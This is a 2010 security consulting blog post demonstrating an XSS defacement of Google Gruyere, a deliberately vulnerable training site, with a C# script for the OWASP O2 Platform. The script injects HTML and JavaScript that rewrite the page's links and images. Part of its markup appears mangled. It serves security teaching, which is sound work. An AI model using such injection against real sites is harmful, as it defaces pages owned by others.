parsonsisconsulting

Parsons Software Security Consulting Blog

XSS with 02 script editor Defacement on Gruyere

leave a comment »

Today’s post is going to go through step by step on Gruyere XSS defacement.

We already created our XSS builder with 02.   Now we are going to do a XSS defacement.

Above is the regular Gruyere Login page.   Below is Defacement with the IE Script Execution.

Here is all the code needed for the defacement.


using O2.XRules.Database.Utils;

using O2.XRules.Database.APIs;

using O2.External.SharpDevelop.Ascx;

using O2.External.SharpDevelop.ExtensionMethods;

using O2.DotNetWrappers.Network;

using O2.DotNetWrappers.DotNet;

using O2.DotNetWrappers.Windows;

using O2.DotNetWrappers.ExtensionMethods;

using O2.Views.ASCX.classes.MainGUI;

using O2.Views.ASCX.CoreControls;

using O2.Views.ASCX.ExtensionMethods;

using O2.Kernel.ExtensionMethods;

using O2.Kernel;

using O2.Interfaces;

using System.Linq;

using System.Xml.Linq;

using System.Xml;

using System.Collections.Generic;

using System.Windows.Forms;

using System.Drawing;

using System;

using O2.XRules.Database.Utils.O2;

public class DynamicType

{

public void dynamicMethod(object returnData, System.Windows.Forms.Panel panel)

{

panel.clear();

var ie = panel.add_IE().silent(true);

ie.open("http://google-gruyere.appspot.com/856783677371/login");

var target = ie.elements("DIV").str("Gruyere: Login");

target.flash();

target.injectHtml("beforeBegin", "<h1>O2 Platform Demos</h1>" + "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform\">OWASP O2 Platform</a>" + "<script DEFER> " + " //alert(document.links[0].href);" + " document.links[0].href = \"http://o2platform.com\";" + " document.images[0].src =\" <a href="http://o2platform.com/images/a/">http://o2platform.com/images/a/</a> " + "a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" + " //alert(document.images[0].sec);" + " //document.images[1].href = " + " //alert(document.images[1].href);" + "</script>");

}

}

//O2File:WatiN_IE_ExtensionMethods.cs

//using O2.XRules.Database.Utils.O2

//O2Ref:WatiN.Core.1x.dll

This is what Dinis Created and what is under the hood of these little scripts. It’s a bit more complex.

I was speaking to Dinis and in his own words after  I questioned him about the code he explained some of it too me.

what happens when you select the ‘show/hide generated source code’ is that you see the actual method that gets compiled (basicaly I automatically put the text you put on the main script window inside that public object dynamicMethod(object returnData, string testString, int testNumber) method

– the silent(true) in IE is just to prevent pop-ups (and sometimes you need to put it to false since you need to act on those popups)

– the ‘flash()’ method is used to slow down a little bit the script execution and so that you can see visually which HTML field is being edited

If you have any questions e-mail me. Matt Parsons, CISSP, MSM

Parsons Software Security Consulting, LLC

Written by mparsons1980

November 25, 2010 at 1:39 am

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: